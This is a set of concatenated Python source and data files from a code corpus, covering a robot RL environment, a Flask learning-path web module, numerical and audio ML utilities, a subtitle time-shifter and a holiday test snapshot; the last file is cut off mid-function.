Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 22: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 23: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 24: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 25: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 26: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 27: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 28: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 29: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 30: Joint_state = [0, 0, 0, 0, 0, 0,0] self.kinova_rob.go_to_joint_state(tuple(Joint_state)) states = self.get_obs() return states def seed(self, seed=None): self.np_random, seed = seeding.np_random(seed) return [seed] #Function to step the hardware forward in time def step(self, action): total_reward = 0 self.finger_pos_goal = FingerPosition() self.finger_pos_goal.finger1 = action[0] self.finger_pos_goal.finger2 = action[1] self.finger_pos_goal.finger3 = action[2] self.finger_command_pub.publish(self.finger_pos_goal) while not rospy.get_param('exec_done'): rospy.sleep(0.1) obs = self.get_obs() ### Get this reward for RL training ### total_reward, info, done = self.get_reward() ### Get this reward for grasp classifier collection ### #total_reward, info, done = self.get_reward_DataCollection() return obs, total_reward, done, info def joint_state_callback(self, msg): self.joint_states = msg def finger_state_callback(self, msg): self.finger_pos = msg def object_pose_callback(self, msg): self.object_pose = msg class GraspValid_net(nn.Module): def __init__(self, state_dim): super(GraspValid_net, self).__init__() self.l1 = nn.Linear(state_dim, 256) self.l2 = nn.Linear(256, 256) self.l3 = nn.Linear(256, 1) def forward(self, state): # pdb.set_trace() a = F.relu(self.l1(state)) a = F.relu(self.l2(a)) a = torch.sigmoid(self.l3(a)) return a
StarcoderdataPython
1650510
<reponame>linkolearn/linkolearn from shopyo.api.module import ModuleHelp from flask import render_template from flask import url_for from flask import redirect from flask import flash from flask import request from flask import jsonify # from shopyo.api.html import notify_success # from shopyo.api.forms import flash_errors from flask_login import login_required from flask_login import current_user from modules.box__default.auth.models import User from modules.box__linkolearn.linkolearn.models import Path from modules.box__linkolearn.linkolearn.models import Section from modules.box__linkolearn.linkolearn.models import Link from modules.box__linkolearn.linkolearn.models import LikeList from modules.box__linkolearn.linkolearn.models import BookmarkList from modules.box__linkolearn.linkolearn.models import Emoji from modules.box__linkolearn.linkolearn.forms import ChangeNameForm from modules.box__linkolearn.linkolearn.forms import ChangePasswordForm from shopyo.api.security import get_safe_redirect from shopyo.api.forms import flash_errors from shopyo.api.html import notify import validators mhelp = ModuleHelp(__file__, __name__) globals()[mhelp.blueprint_str] = mhelp.blueprint module_blueprint = globals()[mhelp.blueprint_str] @module_blueprint.route("/") def index(): return mhelp.info['display_string'] @module_blueprint.route("/like/<path_id>", methods=["GET"]) @login_required def toggle_like(path_id): path = Path.query.get(path_id) if path.like_list is None: path.like_list = LikeList() path.save() if current_user not in path.like_list.users: path.like_list.users.append(current_user) else: path.like_list.users.remove(current_user) path.save() if 'next' in request.args: if request.args.get('next') != '': return redirect(get_safe_redirect(request.args.get('next'))) else: return redirect(url_for('www.index')) else: return redirect(url_for('www.index')) @module_blueprint.route("/bookmark/<path_id>", methods=["GET"]) @login_required def toggle_bookmark(path_id): path = Path.query.get(path_id) if path.bookmark_list is None: path.bookmark_list = BookmarkList() path.save() if current_user not in path.bookmark_list.users: path.bookmark_list.users.append(current_user) else: path.bookmark_list.users.remove(current_user) path.save() if 'next' in request.args: if request.args.get('next') != '': return redirect(get_safe_redirect(request.args.get('next'))) else: return redirect(url_for('www.index')) else: return redirect(url_for('www.index')) @module_blueprint.route("/visibility/<path_id>", methods=["GET"]) @login_required def toggle_visibility(path_id): path = Path.query.get(path_id) if path.is_visible == True: path.is_visible = False elif path.is_visible == False: path.is_visible = True path.update() if 'next' in request.args: if request.args.get('next') != '': return redirect(get_safe_redirect(request.args.get('next'))) else: return redirect(url_for('www.index')) else: return redirect(url_for('www.index')) @module_blueprint.route("/settings", methods=["GET"]) @login_required def settings(): context = {} password_form = ChangePasswordForm() name_form = ChangeNameForm() emoji_classes = Emoji.query.all() context.update({ 'password_form': password_form, 'name_form': name_form, 'emoji_classes': emoji_classes }) return render_template('linkolearn_theme/templates/profile_settings.html', **context) @module_blueprint.route("/settings/password", methods=["POST"]) @login_required def change_password(): form = ChangePasswordForm() if not form.validate_on_submit(): flash_errors(form) if not form.password1.data == form.password2.data: flash(notify('Passwords must be same', alert_type='success')) return mhelp.redirect_url(mhelp.info['module_name']+'.settings') current_user.password = <PASSWORD>.data current_user.save() return mhelp.redirect_url(mhelp.info['module_name']+'.settings') @module_blueprint.route("/settings/name", methods=["POST"]) @login_required def change_name(): form = ChangeNameForm() if not form.validate_on_submit(): flash_errors(form) return mhelp.redirect_url(mhelp.info['module_name']+'.settings') current_user.first_name = form.first_name.data current_user.last_name = form.last_name.data current_user.save() return mhelp.redirect_url(mhelp.info['module_name']+'.settings') @module_blueprint.route("/settings/emoji", methods=["POST"]) @login_required def change_emoji(): emoji_classes = [_.class_name for _ in Emoji.query.all()] target_class = request.form['emoji_class'].strip() if not target_class in emoji_classes: flash(notify('Emoji class not found', alert_type='warning')) return mhelp.redirect_url(mhelp.info['module_name']+'.settings') current_user.emoji_class = target_class current_user.save() return mhelp.redirect_url(mhelp.info['module_name']+'.settings') def sectionlinks2str(section_links): return '&#10;'.join([_.url for _ in section_links]) @module_blueprint.route("/settings/p/<path_id>/edit", methods=["GET", "POST"]) @login_required def edit_path(path_id): path = Path.query.get(path_id) if not path.path_user == current_user: return jsonify({'error': 'x'}) if request.method == 'GET': context = {} context.update({ 'path': path, 'sectionlinks2str': sectionlinks2str }) return render_template('linkolearn_theme/templates/edit.html', **context) if request.method == 'POST': json_submit = request.get_json() path_title = json_submit['path_title'] path_link = json_submit['path_link'] sections = json_submit['sections'] path.sections = [] path.title = path_title path.slug = path_link for sec in sections: section = Section() sec_title = sec['section_title'] section.title = sec_title sec_links = sec['section_links'] if sec_links.strip() != '' and '\n' in sec_links: urls = sec_links.split('\n') urls = list((url for url in urls if validators.url(url))) section.links = list((Link(url=url) for url in urls)) path.sections.append(section) path.save() next_url = url_for('www.path', username=current_user.username, path_slug=path.slug) return jsonify({'goto': next_url}) @module_blueprint.route("/bookmarks", methods=["GET", "POST"]) @login_required def bookmarks(): return render_template('linkolearn_theme/templates/bookmarks.html')
StarcoderdataPython
155313
<filename>fdm-devito-notebooks/01_vib/exer-vib/vib_conv_rate.py import numpy as np import matplotlib.pyplot as plt from vib_verify_mms import solver def u_exact(t, I, V, A, f, c, m): """Found by solving mu'' + cu = F in Wolfram alpha.""" k_1 = I k_2 = (V - A*2*np.pi*f/(c - 4*np.pi**2*f**2*m))*\ np.sqrt(m/float(c)) return A*np.sin(2*np.pi*f*t)/(c - 4*np.pi**2*f**2*m) + \ k_2*np.sin(np.sqrt(c/float(m))*t) + \ k_1*np.cos(np.sqrt(c/float(m))*t) def convergence_rates(N, solver_function, num_periods=8): """ Returns N-1 empirical estimates of the convergence rate based on N simulations, where the time step is halved for each simulation. solver_function(I, V, F, c, m, dt, T, damping) solves each problem, where T is based on simulation for num_periods periods. """ def F(t): """External driving force""" return A*np.sin(2*np.pi*f*t) b, c, m = 0, 1.6, 1.3 # just some chosen values I = 0 # init. cond. u(0) V = 0 # init. cond. u'(0) A = 1.0 # amplitude of driving force f = 1.0 # chosen frequency of driving force damping = 'zero' P = 1/f dt = P/30 # 30 time step per period 2*pi/w T = P*num_periods dt_values = [] E_values = [] for i in range(N): u, t = solver_function(I, V, F, b, c, m, dt, T, damping) u_e = u_exact(t, I, V, A, f, c, m) E = np.sqrt(dt*np.sum((u_e-u)**2)) dt_values.append(dt) E_values.append(E) dt = dt/2 #plt.plot(t, u, 'b--', t, u_e, 'r-'); plt.grid(); plt.show() r = [np.log(E_values[i-1]/E_values[i])/ np.log(dt_values[i-1]/dt_values[i]) for i in range(1, N, 1)] print r return r def test_convergence_rates(): r = convergence_rates( N=5, solver_function=solver, num_periods=8) # Accept rate to 1 decimal place tol = 0.1 assert abs(r[-1] - 2.0) < tol if __name__ == '__main__': test_convergence_rates()
StarcoderdataPython
1693483
<gh_stars>100-1000 import pytest def test_upgrade_chip_replication_quality_metric_1_2(upgrader, chip_replication_quality_metric_1): value = upgrader.upgrade( "chip_replication_quality_metric", chip_replication_quality_metric_1, current_version="1", target_version="2", ) assert value["schema_version"] == "2" assert value.get("idr_dispersion_plot") == "ENCFF002DSJ.raw.srt.filt.nodup.srt.filt.nodup.sample.15.SE.tagAlign.gz.cc.plot.pdf" assert 'IDR_dispersion_plot' not in value
StarcoderdataPython
3201177
<filename>tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hu_HU-2019] 1.py<gh_stars>10-100 [ { 'date': '2019-01-01', 'description': 'Újév', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NF' }, { 'date': '2019-03-15', 'description': 'Az 1848-as forradalom ünnepe', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NF' }, { 'date': '2019-04-19', 'description': 'Nagypéntek', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRV' }, { 'date': '2019-04-21', 'description': 'Húsvét', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRV' }, { 'date': '2019-04-22', 'description': 'Húsvéthétfő', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRV' }, { 'date': '2019-05-01', 'description': 'A munka ünnepe', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NF' }, { 'date': '2019-06-09', 'description': 'Pünkösd', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRV' }, { 'date': '2019-06-10', 'description': 'Pünkösdhétfő', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRV' }, { 'date': '2019-08-19', 'description': 'Munkaszüneti Nap', 'locale': 'hu-HU', 'notes': '2019-08-10 pihenőnap', 'region': '', 'type': 'NF' }, { 'date': '2019-08-20', 'description': 'Az államalapítás ünnepe', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NF' }, { 'date': '2019-10-23', 'description': 'Az 1956-os forradalom ünnepe', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NF' }, { 'date': '2019-11-01', 'description': 'Mindenszentek', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRF' }, { 'date': '2019-12-24', 'description': 'Munkaszüneti Nap', 'locale': 'hu-HU', 'notes': '2019-12-07 pihenőnap', 'region': '', 'type': 'NF' }, { 'date': '2019-12-25', 'description': 'Karácsony', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRF' }, { 'date': '2019-12-26', 'description': 'Karácsony', 'locale': 'hu-HU', 'notes': '', 'region': '', 'type': 'NRF' }, { 'date': '2019-12-27', 'description': 'Munkaszüneti Nap', 'locale': 'hu-HU', 'notes': '2019-12-14 pihenőnap', 'region': '', 'type': 'NF' } ]
StarcoderdataPython
34082
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np from deepspeech.frontend.utility import IGNORE_ID from deepspeech.io.utility import pad_sequence from deepspeech.utils.log import Log __all__ = ["SpeechCollator"] logger = Log(__name__).getlog() class SpeechCollator(): def __init__(self, keep_transcription_text=True): """ Padding audio features with zeros to make them have the same shape (or a user-defined shape) within one bach. if ``keep_transcription_text`` is False, text is token ids else is raw string. """ self._keep_transcription_text = keep_transcription_text def __call__(self, batch): """batch examples Args: batch ([List]): batch is (audio, text) audio (np.ndarray) shape (D, T) text (List[int] or str): shape (U,) Returns: tuple(audio, text, audio_lens, text_lens): batched data. audio : (B, Tmax, D) audio_lens: (B) text : (B, Umax) text_lens: (B) """ audios = [] audio_lens = [] texts = [] text_lens = [] for audio, text in batch: # audio audios.append(audio.T) # [T, D] audio_lens.append(audio.shape[1]) # text # for training, text is token ids # else text is string, convert to unicode ord tokens = [] if self._keep_transcription_text: assert isinstance(text, str), (type(text), text) tokens = [ord(t) for t in text] else: tokens = text # token ids tokens = tokens if isinstance(tokens, np.ndarray) else np.array( tokens, dtype=np.int64) texts.append(tokens) text_lens.append(tokens.shape[0]) padded_audios = pad_sequence( audios, padding_value=0.0).astype(np.float32) #[B, T, D] audio_lens = np.array(audio_lens).astype(np.int64) padded_texts = pad_sequence( texts, padding_value=IGNORE_ID).astype(np.int64) text_lens = np.array(text_lens).astype(np.int64) return padded_audios, audio_lens, padded_texts, text_lens
StarcoderdataPython
1662162
<reponame>mporcheron/pyfeedbacker # -*- coding: utf-8 -*- from collections import OrderedDict import abc class AbstractModelContainer(OrderedDict): def __init__(self, root_model, child_data_type = None, parent_data_id = None): """Base class for storing data by ID. Its expected that any specific data type will extended this class and provide the data container type through calling `__init__` on `super()`. This is essentially an `collections.OrderedDict`. Keyword arguments: root_model -- The root model object. child_data_type -- A data type that will be stored inside this container. New data will be initialised to an instance of this type. parent_data_id -- ID of the parent data container, if it exists. """ self._root_model = root_model self._child_data_type = child_data_type self._parent_data_id = parent_data_id def __getitem__(self, data_id): """Retrieve an item using the square bracket syntax. If a particular `data_id` doesn't exist, then one will be created with an initialised value passed into `__init__`. Arguments: data_id -- Identifier for a piece of data, will be converted to a string if it isn't already a string. """ data_id = str(data_id) try: return super().__getitem__(data_id) except KeyError: if self._child_data_type is None: new_obj = None elif issubclass(self._child_data_type, AbstractModelContainer): new_obj = self._child_data_type(self._root_model, parent_data_id = data_id) else: new_obj = self._child_data_type(self._root_model) self.__setitem__(data_id, new_obj) return new_obj def __setitem__(self, data_id, value): """Set an item using the square bracket syntax. Arguments: data_id -- Identifier for a piece of data, will be converted to a string if it isn't already a string. value -- The value to store in the model. """ data_id = str(data_id) # If value is inserted somewhere else, delete the existing one try: existing_index = list(self.values()).index(value) existing_key = list(self.keys())[existing_index] del self[existing_key] except: pass # If the data_id is not correct inside value, change it try: child_parent_id = value._parent_data_id if data_id != child_parent_id: value._parent_data_id = data_id except: pass return super().__setitem__(data_id, value) def __contains__(self, data_id): """Determine if a particular `data_id` exists. Arguments: data_id -- Identifier for a piece of data, will be converted to a string if it isn't already a string. """ data_id = str(data_id) return super().__contains__(data_id) dict = property(lambda self:self.__dict__(), doc=""" Retrieve a copy of the data as a new dictionary. """) @abc.abstractmethod def __dict__(self): """Retrieve a copy of the data as a new dictionary.""" return dict(self.items()) def __repr__(self): ret = f'{self.__class__.__name__}(' ret += str(list(self)) ret += ')' return ret class DataByStage(AbstractModelContainer): def __init__(self, root_model, child_data_type, parent_data_id): """Create a container for storing data for each stage. Arguments: root_model -- The root model object. child_data_type -- A data type that will be stored inside this container. New data will be initialised to an instance of this type. parent_data_id -- The identifier of the key in the parent container, which in this case is the submission identifier. """ super().__init__(root_model = root_model, child_data_type = child_data_type, parent_data_id = parent_data_id) submission = property(lambda self:self._parent_data_id, doc=""" Retrieve the submission identifier """) def __dict__(self): """Retrieve a copy of the data as a new dictionary.""" items = {} for key, value in self.items(): items[key] = value.dict return items class Data(AbstractModelContainer): pass
StarcoderdataPython
3278298
<filename>djangorestframework_hal/parsers.py<gh_stars>0 from .renderers import HalJSONRenderer from .settings import api_settings from .utils import parse_from_hal class HalJSONParser(api_settings.PARSER_CLASS): media_type = "application/hal+json" renderer_class = HalJSONRenderer def parse(self, stream, media_type=None, parser_context=None): data = super().parse(stream, media_type, parser_context) parsed_data = parse_from_hal(data) return parsed_data
StarcoderdataPython
35063
#!/usr/bin/env python3 import sys import os.path import re from datetime import date, datetime, time, timedelta # helper def is_timeformat(s): p = re.compile('^[0-9]{2}:[0-9]{2}:[0-9]{2},[0-9]{3}$') if p.match(s) is None: return False else: return True def is_time_line(l): p = re.compile('^[0-9]{2}:') m = p.match(l) if m is None: return False else: return True def get_time(s): dt = datetime.strptime(s, "%H:%M:%S,%f") return dt.time() def get_str(t): return t.strftime("%H:%M:%S,%f")[:-3] def add(t0, delta): delta = timedelta(hours=delta.hour, minutes=delta.minute, seconds=delta.second, microseconds=delta.microsecond) dt = datetime.combine(date.today(), t0) + delta return dt.time() def sub(t0, delta): delta = timedelta(hours=delta.hour, minutes=delta.minute, seconds=delta.second, microseconds=delta.microsecond) dt = datetime.combine(date.today(), t0) - delta return dt.time() def get_endpoints(l): l = l.rstrip() sep = re.compile("[ ]+-->[ ]+") ts = sep.split(l) return list(map(get_time, ts)) def transform_time_line(l, delta, sens): es = get_endpoints(l) tes = list() for e in es: if sens == '+': tes.append(add(e, delta)) else: tes.append(sub(e, delta)) return get_str(tes[0]) + " --> " + get_str(tes[1]) + "\n" # main if __name__ == "__main__": filesrt = sys.argv[1] if not os.path.isfile(filesrt): print("ERROR: file isn't exist !") exit(1) filesrtnew = filesrt + ".new" t0 = sys.argv[2] if not is_timeformat(t0): print("ERROR: t0 isn't correct !") exit(1) t0 = get_time(t0) delta = 0 sens = "" is_first_timeline = True with open(filesrt) as inputf: print("Reading {}".format(filesrt)) for l in inputf: if is_time_line(l): if is_first_timeline: tt0 = get_endpoints(l)[0] if tt0 > t0: delta = sub(tt0, t0) sens = '-' print("Delta: -{}".format(get_str(delta))) else: delta = sub(t0, tt0) sens = '+' print("Delta: +{}".format(get_str(delta))) is_first_timeline = False with open(filesrtnew, "a") as outputf: outputf.write(transform_time_line(l, delta, sens)) else: with open(filesrtnew, "a") as outputf: outputf.write(l) print("Writing {}".format(filesrtnew))
StarcoderdataPython
74915
import os import random import time import torch import torch.nn.functional as F import torch.nn as nn import numpy as np import scipy.io.wavfile as wavfile import matplotlib from mir_eval.separation import bss_eval_sources from arguments import ArgParser from dataset import MUSICMixDataset from models import ModelBuilder, activate from utils import AverageMeter, \ recover_rgb, magnitude2heatmap,\ istft_reconstruction, warpgrid, \ combine_video_audio, save_video, makedirs from viz import plot_loss_loc_sep_acc_metrics import matplotlib.pyplot as plt import soundfile import cv2 # Network wrapper, defines forward pass class NetWrapper1(torch.nn.Module): def __init__(self, nets): super(NetWrapper1, self).__init__() self.net_sound = nets def forward(self, mags, mag_mix, args): mag_mix = mag_mix + 1e-10 N = args.num_mix B = mag_mix.size(0) T = mag_mix.size(3) # warp the spectrogram if args.log_freq: grid_warp = torch.from_numpy( warpgrid(B, 256, T, warp=True)).to(args.device) mag_mix = F.grid_sample(mag_mix, grid_warp) for n in range(N): mags[n] = F.grid_sample(mags[n], grid_warp) # calculate loss weighting coefficient: magnitude of input mixture if args.weighted_loss: weight = torch.log1p(mag_mix) weight = torch.clamp(weight, 1e-3, 10) else: weight = torch.ones_like(mag_mix) # ground truth masks are computed after warpping! gt_masks = [None for n in range(N)] for n in range(N): if args.binary_mask: # for simplicity, mag_N > 0.5 * mag_mix gt_masks[n] = (mags[n] > 0.5 * mag_mix).float() else: gt_masks[n] = mags[n] / mag_mix # clamp to avoid large numbers in ratio masks gt_masks[n].clamp_(0., 5.) # LOG magnitude log_mag_mix = torch.log(mag_mix).detach() # forward net_sound feat_sound = self.net_sound(log_mag_mix) feat_sound = activate(feat_sound, args.sound_activation) return feat_sound, \ {'gt_masks': gt_masks, 'mag_mix': mag_mix, 'mags': mags, 'weight': weight} class NetWrapper2(torch.nn.Module): def __init__(self, nets): super(NetWrapper2, self).__init__() self.net_frame = nets def forward(self, frame, args): N = args.num_mix # return appearance features and appearance embedding feat_frames = [None for n in range(N)] emb_frames = [None for n in range(N)] for n in range(N): feat_frames[n], emb_frames[n] = self.net_frame.forward_multiframe_feat_emb(frame[n], pool=True) emb_frames[n] = activate(emb_frames[n], args.img_activation) return feat_frames, emb_frames class NetWrapper3(torch.nn.Module): def __init__(self, nets): super(NetWrapper3, self).__init__() self.net_avol = nets def forward(self, feat_frame, feat_sound, args): N = args.num_mix pred_mask = [None for n in range(N)] # appearance attention for n in range(N): pred_mask[n] = self.net_avol(feat_frame[n], feat_sound) pred_mask[n] = activate(pred_mask[n], args.output_activation) return pred_mask # Calculate metrics def calc_metrics(batch_data, pred_masks_, args): # meters sdr_mix_meter = AverageMeter() sdr_meter = AverageMeter() sir_meter = AverageMeter() sar_meter = AverageMeter() # fetch data and predictions mag_mix = batch_data['mag_mix'] phase_mix = batch_data['phase_mix'] audios = batch_data['audios'] # unwarp log scale N = args.num_mix B = mag_mix.size(0) pred_masks_linear = [None for n in range(N)] for n in range(N): if args.log_freq: grid_unwarp = torch.from_numpy( warpgrid(B, args.stft_frame//2+1, pred_masks_[0].size(3), warp=False)).to(args.device) pred_masks_linear[n] = F.grid_sample(pred_masks_[n], grid_unwarp) else: pred_masks_linear[n] = pred_masks_[n] # convert into numpy mag_mix = mag_mix.numpy() phase_mix = phase_mix.numpy() for n in range(N): pred_masks_linear[n] = pred_masks_linear[n].detach().cpu().numpy() # threshold if binary mask if args.binary_mask: pred_masks_linear[n] = (pred_masks_linear[n] > args.mask_thres).astype(np.float32) # loop over each sample for j in range(B): # save mixture mix_wav = istft_reconstruction(mag_mix[j, 0], phase_mix[j, 0], hop_length=args.stft_hop) # save each component preds_wav = [None for n in range(N)] for n in range(N): # Predicted audio recovery pred_mag = mag_mix[j, 0] * pred_masks_linear[n][j, 0] preds_wav[n] = istft_reconstruction(pred_mag, phase_mix[j, 0], hop_length=args.stft_hop) # separation performance computes L = preds_wav[0].shape[0] gts_wav = [None for n in range(N)] valid = True for n in range(N): gts_wav[n] = audios[n][j, 0:L].numpy() valid *= np.sum(np.abs(gts_wav[n])) > 1e-5 valid *= np.sum(np.abs(preds_wav[n])) > 1e-5 if valid: sdr, sir, sar, _ = bss_eval_sources( np.asarray(gts_wav), np.asarray(preds_wav), False) sdr_mix, _, _, _ = bss_eval_sources( np.asarray(gts_wav), np.asarray([mix_wav[0:L] for n in range(N)]), False) sdr_mix_meter.update(sdr_mix.mean()) sdr_meter.update(sdr.mean()) sir_meter.update(sir.mean()) sar_meter.update(sar.mean()) return [sdr_mix_meter.average(), sdr_meter.average(), sir_meter.average(), sar_meter.average()] # Visualize predictions def output_visuals_PosNeg(vis_rows, batch_data, masks_pos, masks_neg, idx_pos, idx_neg, pred_masks_, gt_masks_, mag_mix_, weight_, args): mag_mix = batch_data['mag_mix'] phase_mix = batch_data['phase_mix'] frames = batch_data['frames'] infos = batch_data['infos'] # masks to cpu, numpy masks_pos = torch.squeeze(masks_pos, dim=1) masks_pos = masks_pos.cpu().float().numpy() masks_neg = torch.squeeze(masks_neg, dim=1) masks_neg = masks_neg.cpu().float().numpy() N = args.num_mix B = mag_mix.size(0) pred_masks_linear = [None for n in range(N)] gt_masks_linear = [None for n in range(N)] for n in range(N): if args.log_freq: grid_unwarp = torch.from_numpy( warpgrid(B, args.stft_frame//2+1, gt_masks_[0].size(3), warp=False)).to(args.device) pred_masks_linear[n] = F.grid_sample(pred_masks_[n], grid_unwarp) gt_masks_linear[n] = F.grid_sample(gt_masks_[n], grid_unwarp) else: pred_masks_linear[n] = pred_masks_[n] gt_masks_linear[n] = gt_masks_[n] # convert into numpy mag_mix = mag_mix.numpy() mag_mix_ = mag_mix_.detach().cpu().numpy() phase_mix = phase_mix.numpy() weight_ = weight_.detach().cpu().numpy() idx_pos = int(idx_pos.detach().cpu().numpy()) idx_neg = int(idx_neg.detach().cpu().numpy()) for n in range(N): pred_masks_[n] = pred_masks_[n].detach().cpu().numpy() pred_masks_linear[n] = pred_masks_linear[n].detach().cpu().numpy() gt_masks_[n] = gt_masks_[n].detach().cpu().numpy() gt_masks_linear[n] = gt_masks_linear[n].detach().cpu().numpy() # threshold if binary mask if args.binary_mask: pred_masks_[n] = (pred_masks_[n] > args.mask_thres).astype(np.float32) pred_masks_linear[n] = (pred_masks_linear[n] > args.mask_thres).astype(np.float32) threshold = 0.5 # loop over each sample for j in range(B): row_elements = [] # video names prefix = [] for n in range(N): prefix.append('-'.join(infos[n][0][j].split('/')[-2:]).split('.')[0]) prefix = '+'.join(prefix) makedirs(os.path.join(args.vis, prefix)) # save mixture mix_wav = istft_reconstruction(mag_mix[j, 0], phase_mix[j, 0], hop_length=args.stft_hop) mix_amp = magnitude2heatmap(mag_mix_[j, 0]) weight = magnitude2heatmap(weight_[j, 0], log=False, scale=100.) filename_mixwav = os.path.join(prefix, 'mix.wav') filename_mixmag = os.path.join(prefix, 'mix.jpg') filename_weight = os.path.join(prefix, 'weight.jpg') matplotlib.image.imsave(os.path.join(args.vis, filename_mixmag), mix_amp[::-1, :, :]) matplotlib.image.imsave(os.path.join(args.vis, filename_weight), weight[::-1, :]) wavfile.write(os.path.join(args.vis, filename_mixwav), args.audRate, mix_wav) row_elements += [{'text': prefix}, {'image': filename_mixmag, 'audio': filename_mixwav}] # save each component preds_wav = [None for n in range(N)] for n in range(N): # GT and predicted audio recovery gt_mag = mag_mix[j, 0] * gt_masks_linear[n][j, 0] gt_mag_ = mag_mix_[j, 0] * gt_masks_[n][j, 0] gt_wav = istft_reconstruction(gt_mag, phase_mix[j, 0], hop_length=args.stft_hop) pred_mag = mag_mix[j, 0] * pred_masks_linear[n][j, 0] pred_mag_ = mag_mix_[j, 0] * pred_masks_[n][j, 0] preds_wav[n] = istft_reconstruction(pred_mag, phase_mix[j, 0], hop_length=args.stft_hop) # output masks filename_gtmask = os.path.join(prefix, 'gtmask{}.jpg'.format(n+1)) filename_predmask = os.path.join(prefix, 'predmask{}.jpg'.format(n+1)) gt_mask = (np.clip(gt_masks_[n][j, 0], 0, 1) * 255).astype(np.uint8) pred_mask = (np.clip(pred_masks_[n][j, 0], 0, 1) * 255).astype(np.uint8) matplotlib.image.imsave(os.path.join(args.vis, filename_gtmask), gt_mask[::-1, :]) matplotlib.image.imsave(os.path.join(args.vis, filename_predmask), pred_mask[::-1, :]) # ouput spectrogram (log of magnitude, show colormap) filename_gtmag = os.path.join(prefix, 'gtamp{}.jpg'.format(n+1)) filename_predmag = os.path.join(prefix, 'predamp{}.jpg'.format(n+1)) gt_mag = magnitude2heatmap(gt_mag_) pred_mag = magnitude2heatmap(pred_mag_) matplotlib.image.imsave(os.path.join(args.vis, filename_gtmag), gt_mag[::-1, :, :]) matplotlib.image.imsave(os.path.join(args.vis, filename_predmag), pred_mag[::-1, :, :]) # output audio filename_gtwav = os.path.join(prefix, 'gt{}.wav'.format(n+1)) filename_predwav = os.path.join(prefix, 'pred{}.wav'.format(n+1)) wavfile.write(os.path.join(args.vis, filename_gtwav), args.audRate, gt_wav) wavfile.write(os.path.join(args.vis, filename_predwav), args.audRate, preds_wav[n]) # save frame frames_tensor = recover_rgb(frames[idx_pos][j,:,int(args.num_frames//2)]) frames_tensor = np.asarray(frames_tensor) filename_frame = os.path.join(prefix, 'frame{}.png'.format(idx_pos+1)) matplotlib.image.imsave(os.path.join(args.vis, filename_frame), frames_tensor) frame = frames_tensor.copy() # get heatmap and overlay for postive pair height, width = masks_pos.shape[-2:] heatmap = np.zeros((height*16, width*16)) for i in range(height): for k in range(width): mask_pos = masks_pos[j] value = mask_pos[i,k] value = 0 if value < threshold else value ii = i * 16 jj = k * 16 heatmap[ii:ii + 16, jj:jj + 16] = value heatmap = (heatmap * 255).astype(np.uint8) filename_heatmap = os.path.join(prefix, 'heatmap_{}_{}.jpg'.format(idx_pos+1, idx_pos+1)) plt.imsave(os.path.join(args.vis, filename_heatmap), heatmap, cmap='hot') heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET) fin = cv2.addWeighted(heatmap, 0.5, frame, 0.5, 0, dtype = cv2.CV_32F) path_overlay = os.path.join(args.vis, prefix, 'overlay_{}_{}.jpg'.format(idx_pos+1, idx_pos+1)) cv2.imwrite(path_overlay, fin) # save frame frames_tensor = recover_rgb(frames[idx_neg][j,:,int(args.num_frames//2)]) frames_tensor = np.asarray(frames_tensor) filename_frame = os.path.join(prefix, 'frame{}.png'.format(idx_neg+1)) matplotlib.image.imsave(os.path.join(args.vis, filename_frame), frames_tensor) frame = frames_tensor.copy() # get heatmap and overlay for postive pair height, width = masks_neg.shape[-2:] heatmap = np.zeros((height*16, width*16)) for i in range(height): for k in range(width): mask_neg = masks_neg[j] value = mask_neg[i,k] value = 0 if value < threshold else value ii = i * 16 jj = k * 16 heatmap[ii:ii + 16, jj:jj + 16] = value heatmap = (heatmap * 255).astype(np.uint8) filename_heatmap = os.path.join(prefix, 'heatmap_{}_{}.jpg'.format(idx_pos+1, idx_neg+1)) plt.imsave(os.path.join(args.vis, filename_heatmap), heatmap, cmap='hot') heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET) fin = cv2.addWeighted(heatmap, 0.5, frame, 0.5, 0, dtype = cv2.CV_32F) path_overlay = os.path.join(args.vis, prefix, 'overlay_{}_{}.jpg'.format(idx_pos+1, idx_neg+1)) cv2.imwrite(path_overlay, fin) vis_rows.append(row_elements) def evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader, history, epoch, args): print('Evaluating at {} epochs...'.format(epoch)) torch.set_grad_enabled(False) # remove previous viz results makedirs(args.vis, remove=False) # switch to eval mode netWrapper1.eval() netWrapper2.eval() netWrapper3.eval() # initialize meters loss_meter = AverageMeter() loss_acc_meter = AverageMeter() loss_sep_meter = AverageMeter() loss_loc_meter = AverageMeter() sdr_mix_meter = AverageMeter() sdr_meter = AverageMeter() sir_meter = AverageMeter() sar_meter = AverageMeter() vis_rows = [] for i, batch_data in enumerate(loader): mag_mix = batch_data['mag_mix'] mags = 